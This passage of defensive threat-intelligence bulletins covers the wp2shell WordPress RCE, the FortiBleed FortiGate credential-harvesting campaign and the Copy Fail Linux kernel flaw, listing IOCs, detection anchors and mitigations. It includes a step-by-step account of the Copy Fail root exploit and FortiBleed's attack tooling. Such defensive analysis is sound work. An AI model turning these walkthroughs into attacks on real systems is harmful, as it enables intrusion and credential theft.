firms.TTPs & IOCsBecause rogue accounts and plugin directories use a fixed prefix followed by a random suffix, detection should match the prefix rather than an exact string. The database is the primary source of evidence, as a successful exploit may leave little or no trace in standard web server access logs. The absence of matching log entries should not be treated as evidence that a site is safe (Eye Security, 2026).These indicators are based on the public proof of concept rather than the vendor advisory. At the time of writing, the primary disclosures do not include wp2shell-specific indicators of compromise, meaning a modified version of the exploit may not match them (SOCRadar, 2026).Network-based:Requests to the exploit endpoint: /wp-json/batch/v1 and /?rest_route=/batch/v1.Batch POST bodies containing nested requests arrays and the author_exclude parameter carrying a scalar string value.Host / database artifacts (residual evidence the PoC leaves behind):Rogue admin logins matching wp2_* or w2s_*.Rogue admin email domains @wp2shell.invalid or @wp2shell.shellcode.lol.oembed_cache loopback rows in wp_posts.customize_changeset posts with very high parent IDs.Orphaned usermeta rows and user-ID gaps in wp_users / wp_usermeta.Unexpected administrator rows; tampered active_plugins, siteurl / home, or injected _transient_ / object-cache entries in wp_options.Note the PoC self-cleans the rogue admin and webshell but leaves the oEmbed cache rows and changeset/request posts — those are your durable detection anchors (Eye Security, 2026).Centripetal's PerspectiveA self-cleaning exploit chain like wp2shell illustrates why post-incident detection is a weak defense against pre-authentication vulnerabilities in WordPress Core. The critical steps are embedded in batch POST bodies that rarely appear in standard web server access logs, while the public proof of concept removes both the rogue administrator account and webshell after execution. This may leave only the oembed_cache and customize_changeset rows as the only potential residual evidence.Because the intrusion is designed to leave minimal host-based traces, the most reliable point of control is the network edge, where the exploit request can be blocked before it reaches the vulnerable endpoint.wp2shell is an unauthenticated, pre-authentication RCE vulnerability in WordPress Core, with a publicly available working exploit against a default installation. Confirm that your site is running a fixed release—6.8.6, 6.9.5, 7.0.2, or 7.1 beta2, depending on your branch. Verify the installed version directly; do not assume the forced update was successfully applied.Then address the more difficult question: was the site compromised before it was patched? Run a compromise assessment, review all administrator accounts, and collect the artifacts identified above. Finding no indicators reduces the likelihood of compromise, but it does not prove the site was never accessed.ResourcesEye Security — wp2shell Defenders' Guidehttps://github.com/Icex0/wp2shell-pochttps://www.aikido.dev/blog/unauthenticate d-rce-in-wordpress-wp2shellhttps://thehackernews.com/2026/07/n ew-wp2shell-wordpress-core-flaw-lets.htmlGHSA-ff9f-jf42-662qGHSA-fpp7-x2x2-2mjfhttps://wordpress.org/news/2026/07/wordpress-7-0-2-r elease/Searchlight Cyber researchhttps://nvd.nist.gov/vuln/detail/CVE-2026-60137https://nvd.nist.gov/vuln/detail/CVE-2026-63030https://wp2shell.com/Picus SecurityRapid7SOCRadarSecurityWeek --- ### [FortiBleed: Credential-Harvesting Campaign Targets FortiGate Devices](https://www.centripetal.ai/threat-research/fortibleed-fortigate-credential-harvesting) Published: 2026-07-15 Summary: FortiBleed is an active global campaign targeting exposed FortiGate firewalls and SSL VPNs to steal credentials, move laterally, and enable ransomware. FortiBleed is a global credential compromise campaign targeting internet-facing Fortinet firewalls and SSL VPN gateways. The attack was disclosed in mid-June after researchers identified an inadvertently exposed attacker server containing a verified database of valid administrator and VPN credentials. As of 2026-06-19, there are over 80,000 identified devices across 194 different countries, with security firm SOCRadar confirming 86,644 working credentials. The campaign has been active since at least February 2026 and has been attributed to a financially motivated, Russian-speaking initial access broker (IAB), with the most recent analysis by SOCRadar linking the threat actor to the Lynx/INC ransomware group pending further analysis (SOCRadar, 2026). Additionally, SOCRadar explains that the campaign involves activity such as collecting credential lists, searching for exposed services, brute-forcing accessible systems, and deploying continuous sniffers on compromised FortiGate firewalls that capture credentials. There also appears to be a heavy focus on Small and Medium Businesses with fewer than 200 employees across multiple regions, with a notable emphasis on India and the United States (SOCRadar, 2026). Presence in the dataset should be treated as a prompt to investigate rather than proof of internal compromise.The attack runs on a fully automated, self-sustaining cycle. Initially, brute-forcing techniques applying a list of leaked Fortinet passwords are used against exposed devices. Once access is obtained, a custom Golang-based credential-harvesting tool dubbed FortigateSniffer is deployed to passively capture credentials from traffic passing through the compromised device. The new credentials are then cracked and reused for additional lateral movement into internal networks. Customers with impacted FortiGate appliances should immediately reset all admin and VPN credentials, enforce MFA, upgrade to the latest supported FortiOS version, and restrict management access from the public internet, in line with guidance issued by Fortinet (Fortinet, 2026).Vulnerability TypeFortiBleed is not associated with a new public CVE. Based on vendor reporting and threat intelligence analysis, the campaign exploits weak authentication practices rather than a software flaw, with threat actors reusing credentials from previous incidents and employing brute-force techniques against Fortinet devices. Affected devices had SSL VPN and management interfaces exposed to the internet, weak password hygiene, and a lack of MFA. It is important to note, however, that Fortinet has linked the campaign to two previous advisories (FG-IR-26-060, FG-IR-25-647), citing the reuse of credentials that were leaked during these incidents.Observations based on public reporting:Initial access used reused leaked credentials, applied through brute-force and credential-stuffingStored password hashes from device configs were exported and cracked offline to produce new working credentialsTelcos and MSPs were specifically targeted as a path into downstream networks, with evidence of internal Active Directory accessFortinet emphasizes that the activity is not a new vulnerability and is not related to any recent incident or advisory (Fortinet, 2026). Instead, threat actors exploit weak authentication practices on Fortinet devices. Accordingly, FortiBleed is classified as a credential reuse campaign with no evidence of a zero-day exploitation event (SOCRadar, 2026).The threat actor behind FortiBleed is assessed as a financially motivated, Russian-speaking IAB. This intent is evident from the actor's unintentionally exposed server, which held a list of remote-access logins paired with working credentials prepared for sale. Brokers of this type often sell access to other criminal actors rather than exploit it themselves, though in this case the operation appears tied directly to ransomware deployment. A recent update from SOCRadar has attributed the threat actor to the Lynx/INC ransomware group, based on an operator found accessing both groups' ransomware negotiation panels from FortiBleed infrastructure and on victim overlap with INC's leak site, with a full technical whitepaper pending. Resale activity that may be linked to the campaign has already been observed, though the credibility of the individual sellers varies. Recorded Future’s Insikt Group identified at least two actors offering data allegedly tied to FortiBleed and assessed only one as likely credible. The credible seller, operating under the moniker "SantaAd," is an established member of a top-tier criminal forum and advertised an auction of FortiGate VPN data in mid-June 2026. However, it remains unconfirmed whether this dataset is the same one involved in FortiBleed due to the lack of a sample accompanying the listing. The second, lower-credibility actor adopted the ShinyHunters name and circulated the data on Telegram in what researchers assess to be an extortion attempt (Recorded Future, 2026). The significance of this resale model is that compromise does not stay contained to the original attacker. Once credentials are cracked and catalogued for sale, they can pass to buyers who independently operate from unrelated infrastructure. For affected organizations, these downstream effects indicate that exposure persists well beyond the lifespan of the campaign. Presence in the dataset alone warrants treating perimeter credentials as compromised regardless of remediation elsewhere.Impacted VersionsInternet-facing FortiGate firewalls and SSL VPN gateways across all sectors and regions (not specific to a single firmware version)Heightened risk: devices running FortiOS prior to versions 7.2.11, 7.4.8, and 7.6.1 (PBKDF2-based password hashing upgrade) or devices upgraded without administrator re-authenticationLegacy SHA-256-based storage mechanism for admin credentials remains in place until update and admin re-authentication; attacker can crack legacy SHA-256 hashes from exported configsAs of Fortinet's June 19, 2026 advisory, affected devices generally had SSL VPN and/or administrative interfaces exposed to the internet, weak password hygiene, and no MFA.Mitigation StepsRecommendations from Fortinet, CISA, and SOCRadar include:Terminate sessions and reset credentialsTerminate all active SSL VPN and administrative sessionsReset all Fortinet VPN and administrative passwords (especially on internet-facing systems)Enforce strong password policies on resetImplement Multi-Factor Authentication (MFA)Require MFA (phishing-resistant if possible) on all administrative and VPN accountsEnsure MFA is enforced on all external gateways and administrative interfacesEnsure secure credential storageUpgrade to latest Fortinet versions of 7.4, 7.6, or 8.0 (supports PBKDF2 hashing)Confirm usage of PBKDF2 to store all administrator credentialsRemove older legacy password settings (Fortinet, 2026)Review logs for suspicious activityUnexpected administrator access from an unknown IPUnusual access timesUnknown locationsLateral movementSuspicious/inactive account activityReduce attack surface and lock down management accessEnsure administration of firewall is inaccessible from public internetRestrict Fortinet management interfaces to trusted internal networksRemove or disable unauthorized or unnecessary accountsValidate configurationsReview firewall, VPN users, and other configuration for unauthorized changesNote: although FortiOS 7.2.11 introduced PBKDF2, Fortinet's guidance directs upgrades to 7.4, 7.6, or 8.0.Exploit ProcessThe FortiBleed attack chain is a highly automated, self-sustaining playbook targeting internet-facing FortiGate firewalls and SSL VPN gateways. The campaign operates through a five-stage attack chain, which includes host reconnaissance, initial access through brute-forcing techniques, sniffer deployment on compromised devices, exploitation of internal services using cracked credentials, and exfiltration of sensitive data and session cookies to maintain authenticated access to compromised environments. While FortiGate devices are the primary focus, the operation runs several parallel tracks against other exposed services, including MSSQL servers and Synology devices, with each track following the same pattern of pairing targets with credentials, fingerprinting the protocol, and validating access at scale. Activity details below are drawn from public reporting by SOCRadar.Phase 1 - ReconnaissanceInitial Credential Sourcing: Campaign maintains two distinct credential sources with different purposescreds.txt : plaintext file containing combined data from previous leaks and purchased datasets used as input for credential stuffing across all tracksbase0.txt-base15.txt : 16 plaintext dictionaries containing curated FortiGate administrative account naming conventions used exclusively for SSH brute-force activityScanning and Device Identification: Campaign uses multiple active scanners with passive enrichment utilities for reconnaissanceMasscan: publicly available scanner used to identify open portsShodan_Recon: queries Shodan’s (search engine for internet-connected devices) database to retrieve hostnames, open ports, SSL certificate metadata, and service categories for each hostFortiProbe-fast: multithreaded probe used to filter raw target list into three categories (confirmed FortiGate, non-FortiGate, dead/unresponsive)RDNS-Scan: large-scale PTR resolution across IP list to generate plaintext files containing results, including a list of hosts that resolve to corporate naming conventionsGeoSplit: takes confirmed FortiGate list and partitions by countryTarget Ranking: All previously collected information converges to rank targets according to economic valuematch_corps.py : matches confirmed and geolocated FortiGate IPs to a list of organizations sorted by revenuemerge_revenue.py : combines corporate data from multiple sources and ranks it by revenuebuild_report.py : compiles final report of domains that have not yet been compromised ordered by revenuePhase 2 - Initial AccessCredential Pairing: Correlates confirmed hosts and credentials into a combos fileGen_Rotator : generates host-to-credential combos file scan.txtin output format IP:PORT:login:passParallel Brute-Forcing: Four protocol-specific tracks use different corresponding checkers for authenticationforticheck : used against FortiGate web interfaces for authentication to administrative panel and SSL VPN portalmpbrute2.bin : targets FortiGate administrative SSH access through credential stuffing and dictionary attacks using the 16 wordlists identifiedsyno.bin : targets Synology DiskStation Manager (DSM) web interface on port 5001MSSQL_Checker : targets native SQL Server TDS protocolPhase 3 - Sniffer HarvestFortigateSniffer Deployment: Converts each compromised FortiGate into a passive listening post using gathered SSH credentials, silently capturing authentication traffic traversing the internal networkFortigateSniffer: Golang-based credential-harvesting tool that abuses the FortiOS built-in diagnostic command diagnose sniffer packet to capture authenticated traffic from 24 network protocolsCapture Process: 6-step functionality to deploy FortigateSniffer and extract credentialsLoads a list containing the FortiGate SSH credentialsLogs in via SSH and injects FortigateSnifferParses raw SSH terminal output to extract timestamps and packet bytesPython tool PCAP Deep Analysis Toolkit that parses credentials, hashes, and ticketsWrites report files per device with CyberStrike (open-source AI powered autonomous penetration testing agent) potentially assisting in parts of the workflowRepeats after the next web interface triggerPhase 4 - ExploitationCredential Cracking: Converts collected hashed artifacts into reusable cleartext credentialsHashcat: publicly available GPU-based password-cracking utility that serves as a core repeatable component of the operational pipelineHashtopolis: open-source client-server platform that distributes and manages Hashcat workloads across multiple machinesbot.py : Telegram-based interface that coordinates and dispatches Hashcat jobs across GPU clustersLateral Movement: Multiple Python scripts used to support different stages of lateral movement within compromised networksSMB validation tools authenticate and check privilegeKerberos/active directory validation tools iterate through username/password pairs against Domain ControllersCredential cleanup tools remove noise generated by automated brute-force activityAD enumeration tools run LDAP queries to identify privilege-escalation vectorsPhase 5 - ExfiltrationData Theft: Recursive enumeration on SMB shares to upload files to a remote SSH server without writing to local diskbackup_dfs.py/backup_dfs2.py : automated exfiltration and synchronization tools that pulls files from a target SMB server and push them to the remote SSH serverSession Hijacking: Uses session cookies and tokens captured by the sniffer to gain immediate authenticated access to internal applications without additional exploitationcurl_replay.sh : host-specific scripts that replay HTTP session cookies and tokens to transform passive collection directly into active accessPersistent Access Tooling: Provides repeatable access into the compromised environment without additional actionAgent: compiled Go binary that turns each device into a remote command-execution pointSSHlogger (.NET) + ssh-worker.exe: components that provide an interactive multi-session remote shell usable with any valid SSH credential obtained anywhere in the chainThis structured, multi-phase operation combines large-scale automation with targeted, hands-on-keyboard activity. The campaign is well organized but is also identified as not fully mature. SOCRadar's later analysis characterizes the operation as roughly 20 members with defined roles, with sniffers active on approximately 19,000 devices, falling to around 11,000 after impacted organizations were notified (SOCRadar Update, 2026). The actors continue to rely on manual steps and multiple discrete tools to structure and cleanse data, rather than a single unified workflow. These characteristics indicate an active threat that continues to evolve.TimelineDateEvent2026-02-28Attackers scan internet for exposed remote-access systems2026-05-19 → 2026-05-21FortigateSniffer capture cycles deployed to initiate first wave of 20-min harvest intervals2026-05-31 → 2026-06-15New sniffer deployment wave begins; 659 harvest cycles execute across all compromised FortiGates; 110M+ credentials harvested2026-06-13Researcher Volodymyr Diachenko publicly reports dataset on LinkedIn2026-06-15Activity peak; stolen credentials cracked; backup data stolen from a NATO-aligned defense contractor2026-06-16SOCRadar publishes investigation and names campaign “FortiBleed”2026-06-18CISA publishes alert urging customers to reset credentials and enable MFA2026-06-19Fortinet confirms activity is credential reuse and brute-forcing2026-06-22Follow-up reporting details broader scale including 430,000+ targeted firewalls2026-06-29SOCRadar attributes FortiBleed to Lynx/INC ransomware group (full whitepaper pending)NowCampaign remains active with attacker infrastructure still operational at the time of reportingTTPs & IOCsThe following TTPs and IOCs are drawn from SOCRadar’s analysis of the FortiBleed attack infrastructure. The indicators below cover the campaign’s core infrastructure and primary tooling. MITRE ATT&CK TechniquesTacticTechniqueIDFortiBleed UsageReconnaissanceActive Scanning (Scanning IP Blocks)Search Open Technical DatabasesT1595.001T1596.005Scans the internet to find open RDP, SSH, and MSSQL services; Uses Shodan to identify and profile FortiGate devicesInitial AccessExploit Public-Facing ApplicationValid Accounts (Default Accounts)External Remote ServicesT1190T1078.001T1133Breaks into internet-facing FortiGate devices through the SSH and SSL-VPN login pages using weak/unchanged default credentials; Uses VPN access to reach defense contractor’s networkExecutionCommand and Scripting (Unix Shell)T1059.004Runs built-in FortiOS command over SSH to launch network traffic captureCredential AccessBrute Force (Guessing, Cracking, Spraying, Credential Stuffing)T1110.001-.004Guesses login credentials against FortiGate, MSSQL, and Synology systems; Cracks stolen password hashes; Reuses known credentials against login pages and domain controllersCredential AccessNetwork SniffingAdversary-in-the-MiddleT1040T1557Uses compromised FortiGate to capture login traffic passing through it across multiple servicesCredential AccessSteal Kerberos Tickets (Kerberoasting, AS-REP Roasting)T1558.003-.004Captures Kerberos authentication data; Cracks credentials offlineCredential AccessSteal Web Session CookieT1539Reuses stolen session cookies to log into internal web applications without passwordsDiscoveryAccount Discovery (Domain Account)Network Service DiscoveryT1087.002T1046Maps out internal user accounts, computers, and email addresses; Scans for open RDP and MSSQL servicesCollectionData from Network Shared DriveT1039Copies files in bulk from internal network file sharesCommand and ControlApp Layer Protocol (Web)T1071.001Controls operation through web-based dashboard; Sends results back to central serverIOCsNetwork IndicatorsSubnetRole85.11.187.0/24 (AS211486)Primary C2 layer, anchored by aggregator node 85.11.187.8, hosting sniffers and scanners193.8.187.0/24 (AS206378)Operational backbone for the pentest lab (193.8.187.2) and credential validation (193.8.187.42)194.113.39.0/24 (AS206378)Dedicated sniffer capacity77.91.122.0/24 (AS201814, MEVSPACE)Dedicated scanning and sniffer layer for ASN diversityFile IndicatorsFileDescriptionSHA-256fg_sniffer (multiple builds)FortigateSniffer: deployed via SSH, abuses diagnose sniffer packet command to capture traffic across 24 protocols. Linux, Windows, and several iterative builds (v4, v5, "new") were observedLinux:4d0b62d3162d4be391e3ba1e191dad28e5e5d5b161cfdef60eeb4361a92d8413Windows:80d83eb01f28c87a61b51f1f83805e63a791905f019bd3b87f10a10f66efab1e (additional builds in SOCRadar report)forticheckFortiGate credential checker: tests admin panel and SSL VPN portala8b09fd4f7ff2f298b45ca602992f44b3c2ac3746bcdb182c59ab2a20c690954mpbrute2.binSSH credential stuffing/dictionary attack against FortiGate admin accounts using base0-base15 wordlists2c98c86e6bd6f46cbd6c89d855541b9da91515b1bb986641a77e31c5c6aa2abbgen_rotatorCombines hosts.txt and creds.txt into scan.txt combo lists; offline utility with no networking capabilityb76d83918473be1550db8fe7bf60479841599bc5b0c30e2d1184432b99c7ff02FortiProbe-fastMultithreaded FortiGate probe: filters raw list into confirmed, non-FortiGate, and dead categoriesfa36ad03e92e0399ec4eea7ba37e4a35fd7dc4391558f8f6e9899bce93095f5dAgentRemote management/orchestration binary: allows management of attack tools across fleet via single HTTP calla474e04340a6425914b110bcd55da50a5f3f618f8b36cb4da4bfa6bf1d3804b4SOCRadar's report documents additional indicators, including a large proxy-rotation layer of shared residential and ISP addresses that should be treated as low-confidence, as well as secondary tools and iterative builds of the sniffer. The full lists are available in the report, and all hash values should be verified against the source before use.Centripetal’s PerspectiveCentripetal's CleanINTERNET® service helps organizations defend against FortiBleed, an active credential-harvesting campaign that targets internet-facing Fortinet FortiGate firewalls and SSL VPN gateways. Once attackers gain access to a device, they use it to steal credentials, move through internal networks, and exfiltrate sensitive data. CleanINTERNET uses billions of threat indicators from global threat intelligence feeds combined with human analysis to detect and block traffic to and from known-malicious infrastructure. This includes the operational servers, scanning systems, and sniffer nodes tied to this campaign, which can be blocked before they ever reach an organization's network. As FortiBleed depends on attackers finding and repeatedly probing exposed management and VPN interfaces, reducing that exposure is an important part of staying protected. By limiting the external attack surface and cutting off communication with hostile infrastructure, CleanINTERNET helps disrupt the attack early in its lifecycle before credentials can be harvested and reused.It is important to recognize, however, that network-level blocking reduces exposure without fully closing the risk. The actor behind FortiBleed is a financially motivated IAB, indicating that credentials harvested earlier in the campaign may already have been sold or passed to other threat actors. Blocking this actor's known scanning, sniffer, and C2 nodes disrupts their specific collection and reuse cycle, but it cannot invalidate credentials that have already been sold. As a result, any organization with exposed FortiGate devices should assume prior compromise. Adhering to published recommendations such as rotating all administrative and VPN credentials, enforcing phishing-resistant MFA, and confirming PBKDF2-based credential storage remain essential even where network coverage is in place.A layered approach is therefore the most effective defense against FortiBleed. CleanINTERNET prevents communication with hostile infrastructure and reduces the external attack surface to disrupt the campaign early in its lifecycle, while credential rotation, MFA enforcement, and management-interface lockdown close any residual risk. Defending at both the network and credential layers allows organizations to take a proactive approach to defense and maintain normal operations as the campaign continues to evolve.ResourcesFortinet - Analysis of Reported Credential Compromise of FortiGate DevicesCISA - CISA Urges Hardening Fortinet Devices After Reports of Credential ExposureSOCRadar - FortiBleed: SOCRadar’s Investigation into 86,644 Compromised Fortinet FirewallsSOCRadar Report - Dismantling FortiBleedSOCRadar Update - Is FortiBleed Connected Linked to INC and Lynx Ransomware? All You Need to KnowThe Hacker News - CISA Warns Fortinet Customers as FortiBleed Hits 86,644 FortiGate DevicesThe Hacker News - FortiBleed Targeted FortiGate Firewalls in 110 Million-Credential Harvesting OperationCloudSEK - Inside the FortiBleed Open Directory: A Technical Analysis of What the Attacker Left BehindRecorded Future - FortiBleed Campaign Exposes Credentials for 73,932 FortiGate SystemsKevin Beaumont - An update on FortiBleed - what’s happening with victim orgs --- ### [CVE-2026-31431: Exploitable Kernel Flaw Enables Silent Privilege Escalation](https://www.centripetal.ai/threat-research/cve-2026-31431-exploitable-kernal-flaw) Published: 2026-05-07 Summary: CVE-2026-31431 (“Copy Fail”) is a high-severity Linux kernel vulnerability that enables silent local privilege escalation through improper handling in the crypto subsystem. By abusing AF_ALG and… Copy Fail is a high-severity Linux kernel vulnerability that enables local privilege escalation through improper handling within the crypto subsystem. The issue was identified during analysis of the AF_ALG attack surface, where researchers observed that combining AF_ALG with splice allows unprivileged users to pass page cache references from read-only files, including setuid binaries, into kernel crypto operations.With insight from Taeyang Lee and guided analysis leveraging Theori’s Copy Fail research code, the investigation focused on reachable execution paths and quickly identified this issue as a critical finding. Successful exploitation allows attackers to modify in-memory representations of privileged binaries, resulting in reliable root-level code execution without altering files on disk.Vulnerability Type (CWE)CWE-669: Incorrect Resource Transfer Between Spheres Improper handling of data across trust boundaries allows user-controlled input to influence privileged kernel memory, resulting in unintended modification of protected resources and enabling privilege escalation.CVSS Score (v3.1)Base Score: 7.8 HIGHAttack Vector: (AV:L)Attack Complexity: (AC:L)Privileges Required: (PR:L)**User Interaction: (**UI:N)Scope: (S:U)Impact on CIA:Confidentiality: High (C:H)Integrity: High (I:H)Availability: High (A:H)Impacted VersionsThe vulnerability affects a broad range of Linux distributions, as the underlying code has been present in kernel versions released since approximately 2017. Given that the affected functionality is enabled by default in most mainstream distributions, systems running kernels from this timeframe should be considered potentially impacted. In addition to vulnerable kernel versions identified across major Linux distributions, certain CloudLinux environments were also observed to be affected. Ubuntu 26.04 (Resolute) is not affected. (Ubuntu, 2026) The versions below represent commonly deployed distributions and platforms where vulnerable kernels have been observed, tested or validated.Vulnerable Kernels (Kodem Security, 2026)DistributionStatusKernelUbuntu 24.04 LTSVulnerable6.17.0-1007-awsAmazon Linux 2023Vulnerable6.18.8-9.213.amzn2023RHEL 10.1Vulnerable6.12.0-124.45.1.el10_1SUSE 16Vulnerable6.12.0-160000.9-defaultVulnerable CloudLinux (Kodem Security, 2026)EnvironmentStatusPatch / Upgrade targetCloudLinux 7Not VulnerableNot affectedCloudLinux 7hVulnerableUpgrade to kernel-4.18.0-553.121.1.lve.el7h.x86_64 or laterCloudLinux 8VulnerableUpgrade to kernel-4.18.0-553.121.1.lve.el8.x86_64 or laterCloudLinux 9VulnerableUpgrade to kernel-5.14.0-611.49.2.el9_7 or laterCloudLinux 10VulnerableUpgrade to kernel-6.12.0-124.52.2.el10_1 or laterThis significantly increases risk in environments that rely on shared-kernel multi-tenancy or where workload isolation is incomplete, such as:Kubernetes clustersCI/CD systemsShared development environmentsCloud notebook platformsMulti-tenant container infrastructureMitigation StepsApply Kernel Patches Upgrade to a vendor-patched Linux kernel to fully remediate the vulnerability.Disable algif_aead Module Prevent loading of the vulnerable crypto interface (e.g., blacklist or unload the module).Block at Boot Use initcall_blacklist=algif_aead_init to prevent the module from initializing.Restrict AF_ALG Access Limit access to the crypto API for unprivileged users to reduce exposure:echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf rmmod algif_aead 2>/dev/null Warning The commonly circulated modprobe.d mitigation does not work on certain environments, including CloudLinux, AlmaLinux, and other RHEL-based distributions where algif_aead is compiled directly into the kernel (CONFIG_CRYPTO_USER_API_AEAD=y). In these cases, modprobe.d rules cannot prevent the component from loading, and rmmod cannot remove it, resulting in a false sense of protection while the vulnerable functionality remains active. Exploit Process (Based on Xint Analysis)1. Initialize Crypto SocketThe attacker opens an AF_ALG socket using the Linux kernel crypto API and binds it to an AEAD cipher (authencesn(hmac(sha256),cbc(aes))).A key is set, and a request socket is accepted.This interface is accessible to unprivileged users by default, requiring no elevated permissions.2. Prepare Targeted Memory WriteThe exploit targets a setuid-root binary such as /usr/bin/su.The payload is split into 4-byte segments.For each segment:sendmsg() is used to pass controlled metadata (AAD), embedding the bytes to be writtensplice() maps the target binary’s page cache into the operationParameters are carefully aligned so the write lands at a specific offset within the binary’s .text section3. Trigger Kernel Write PrimitiveA recv() call initiates the decryption routine within the kernel.During processing:The kernel incorrectly writes attacker-controlled bytes into memoryThe write crosses into the page cache of the target binaryAlthough integrity checks fail afterward, the modified bytes remain in memory, resulting in a corrupted cached copy of the binary4. Execute Modified BinaryOnce the payload is fully written, the attacker executes /usr/bin/suThe kernel loads the binary from the modified page cache, not diskBecause the binary retains its setuid-root permissions, the injected code executes with UID 0 (root)5. OutcomeSuccessful exploitation results in reliable local privilege escalationNo on-disk changes are required, reducing forensic visibilityThe technique leverages kernel logic flaws rather than traditional memory corruption, increasing stability and repeatabilityProof-of-Concept AvailabilityA public proof of concept (PoC) is available for this vulnerability. It should only be used in authorized testing environments to validate exposure and patch effectiveness.ConditionsRequires Python 3.10+ for os.splice support. Earlier versions may fail silently and produce false negatives.modprobe based mitigation is ineffective on WSL2 and certain RHEL-based distributions where algif_aead is built into the kernel.Public PoC currently supports x86_64 architectures only. ARM systems require modified shellcode. GitHub repository Link Figure 1. Copy Fail Proof of Concept Code Targeting /usr/bin/suTimelineDateEvent2026-03-23Vulnerability reported to Linux kernel security team2026-03-24Initial acknowledgement received2026-03-25Patches proposed and reviewed2026-04-01Patches committed to mainline kernel2026-04-22CVE-2026-31431 assigned2026-04-29Public disclosure2026-05-01Added to CISA Known Exploited Vulnerabilities (KEV) catalogTTPs (MITRE ATT&CK Mapping)TTP mappings are derived from MITRE ATT&CK technique definitions and aligned to observed exploit behavior, including privilege escalation via kernel exploitation and abuse of setuid mechanisms.T1078 – Valid Accounts Exploitation requires access to a local user account, which can be obtained through prior compromise, shared environments, or legitimate user access.T1068 – Exploitation for Privilege Escalation The vulnerability is leveraged to elevate privileges from a low-privileged user to root by abusing flaws in the kernel crypto subsystem.T1548.001 – Abuse Elevation Control Mechanism: Setuid and Setgid The exploit targets a setuid binary such as /usr/bin/su, modifying its in-memory representation so that execution results in root-level access.Centripetal’s PerspectiveCentripetal is actively monitoring the development of CVE-2026-31431. Copy Fail is a significant Linux local privilege escalation vulnerability that abuses legitimate kernel functionality present in widely deployed kernels for years, enabling reliable root-level code execution without modifying files on disk. While it requires prior access to the system, it becomes highly impactful when chained with common intrusion vectors such as phishing, loaders, exposed services, or container escapes. The vulnerability presents elevated risk in environments where attackers can obtain limited local execution and subsequently escalate privileges to achieve full system compromise.ResourcesCOPY.FAILBugCrowd - What we know about Copy Fail (CVE-2026-31431)Xint - Copy Fail: 732 Bytes to Root on Every Major Linux Distribution.The Hacker News - New Linux 'Copy Fail' Vulnerability Enables Root Access on Major DistributionsCVE.ORG - CVE-2026-31431OvhCloud - Copy.Fail (CVE-2026-31431): How to Rapidly Protect OVHcloud MKS Clusters from the Linux Kernel Zero-DayNIST - CVE-2026-31431 DetailGitHub - copy_fail_exp.pyKodemSecurity - CVE-2026-31431 (Copy Fail): Linux Kernel LPE Breakdown and Remediation RunbookCloudLinux - CVE-2026-31431 (Copy Fail): Kernel Update on CloudLinuxUbuntu - Ubuntu 26.04 (Resolute) not affectedCISA KEV - Added as a known exploited vulnerability --- ### [Pre-Positioned Access: The Cyber Threat Behind the Iran Conflict](https://www.centripetal.ai/threat-research/pre-positioned-access-cyber-threat-iran-conflict) Published: 2026-03-20 Summary: Pre-positioned access across U.S., European, and Middle Eastern networks is now being activated following Iran-related escalation. This bulletin details active intrusions, threat actors, and… Three weeks into the conflict between the United States, Israel, and Iran, the cyber threat landscape has moved from elevated risk to confirmed active intrusion across multiple geographies. This activity reflects a transition from pre-positioned access to active operations following the February 28 United States and Israel led strikes. The result is a cyber threat environment that extends far beyond the immediate conflict zone, with confirmed targeting across North America, Europe and the broader middle east.The activity observed in this conflict is not driven by a single actor, but by a clustered ecosystem of Iranian-aligned groups with overlapping infrastructure, tooling, and objectives.Seedworm, a sub-cluster of MuddyWater, established persistent backdoor access on banking, airport, defense, and NGO networks as early as February 2026, using legitimate cloud storage on Backblaze and Wasabi for delivery and Rclone for exfiltration. These are not legacy indicators from a previous campaign. On March 11, Handala conducted a confirmed cyberattack against Stryker Corporation, a US medical device manufacturer serving over 150 million patients globally. This forced an SEC disclosure, confirming disruption to global network and IT systems. It is the first confirmed Iranian-linked cyberattack on a US company since the conflict began on February 28.Strikes targeting Iran’s senior military and cyber leaders disrupted centralized coordination, but did not remove operational capability. Instead, these strikes acted as a trigger for the activation of previously established access. Pre-positioned access, externally hosted infrastructure, and coordinated hacktivist groups continue to operate independently of the domestic internet blackout.Immediate Recommendations:Hunt for Dindoor and Fakeset. Revoke active session tokens. Take ICS interfaces off the public internet. Validate cloud failover if workloads run in AWS Bahrain or the UAE. Patch CVEs today.Cyber Relevant Operational Context💡 The majority of infrastructure described in this report is Iranian-attributed, meaning it is assessed as operated by or provisioned for Iranian-aligned actors regardless of where the IP address physically resides. Most of it sits on European and US hosting providers, not on Iranian ASNs. Iranian IP space refers specifically to addresses geolocated to Iranian autonomous system numbers.Pre-Conflict Activity and Access EstablishmentBefore the February 28 strikes, the pre-conflict period in early 2026 was characterized by port system scanning, energy infrastructure targeting, and network pre-positioning attributed to Iranian-aligned actors.The operationally decisive concern is not new access, but the activation of access established before February 28. Seedworm had established persistent footholds on US banking, airport, and defense-linked networks before the conflict began. Dust Specter was suspected of deploying novel malware against Iraqi government officials as recently as January 2026 (Zscaler, 2026). MuddyWater's open C2 directory infrastructure was observable and staging through late February, with a Sliver C2 standing up on March 2 at the same cluster IP.Degradation of Centralized Cyber CoordinationA digital offensive caused Iranian national internet connectivity to collapse to 1-4% of its normal capacity. The United States Chairman of the Joint Chiefs of Staff confirmed that coordinated cyber and space operations disrupted Iranian communications and sensor networks ahead of the initial strikes (The Record, 2026). As a result, Iran's offensive cyber capability has faced significant near-term operational disruption. The loss of the three most senior officials who directly governed Iran's cyber and electronic warfare operations, combined with the sustained internet blackout, has materially degraded the Islamic Republic's ability to centrally coordinate campaigns.Infrastructure provisioning and capability staging do not require centralized command coordination. Operational cells working from infrastructure outside of Iran's borders have demonstrated the capacity to maintain operational tempo independent of the domestic internet outage. Handala has specifically insulated itself from this disruption by leveraging Starlink satellite connectivity since mid-January 2026 (CheckPoint, 2026).Geographic Expansion and HacktivismAs of March 2, 2026, approximately sixty pro-Iranian and pro-Russian hacktivist groups were confirmed active. These were coordinated through an Electronic Operations Room established on Telegram. Pro-Russia groups including NoName057(16) and Russian Legion have joined in support of Iran, and the Iraqi Cyber Resistance declared a cyber war on Kuwait on March 6, expanding the geographic scope of the hacktivist coalition (Unit42, 2026).Russia has additionally provided intelligence support and is benefiting economically from increased demand for its energy exports as an alternative to disrupted Gulf crude. Insikt Group and Sophos both assess the majority of hacktivist entities as engaging primarily in unsophisticated tactics, inflated breach claims, and narrative amplification rather than confirmed operational impact. BaqiyatLock has offered free ransomware-as-a-service affiliate memberships to members capable of targeting Israeli organizations, introducing a financially motivated criminal vector alongside the ideologically motivated hacktivist tier.Threat Actor Landscape MuddyWater operates on 